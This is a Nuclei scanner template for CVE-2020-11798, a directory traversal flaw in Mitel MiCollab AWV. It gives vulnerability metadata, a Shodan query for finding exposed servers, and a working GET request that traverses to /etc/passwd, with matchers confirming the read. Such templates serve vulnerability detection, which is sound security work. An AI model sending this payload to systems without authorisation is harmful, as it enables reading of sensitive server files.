nuclei-templates/http/cves/2020/CVE-2020-11798.yaml

53 lines
2.0 KiB
YAML

id: CVE-2020-11798
info:
name: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal
author: ritikchaddha
severity: medium
description: |
A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.
reference:
- https://packetstormsecurity.com/files/171751/mma913-traversallfi.txt
- https://nvd.nist.gov/vuln/detail/CVE-2020-11798
- http://packetstormsecurity.com/files/171751/Mitel-MiCollab-AWV-8.1.2.4-9.1.3-Directory-Traversal-LFI.html
- https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin-20-0005-01.pdf
- https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-20-0005
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-11798
cwe-id: CWE-22
epss-score: 0.75314
cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:*
epss-percentile: 0.97741
metadata:
max-request: 1
verified: true
shodan-query: html:"Mitel" html:"MiCollab"
vendor: mitel
product: micollab_audio\,_web_\&_video_conferencing
tags: packetstorm,cve,cve2020,mitel,micollab,lfi
http:
- method: GET
path:
- "{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- application/x-download
- filename=passwd
condition: and
- type: status
status:
- 200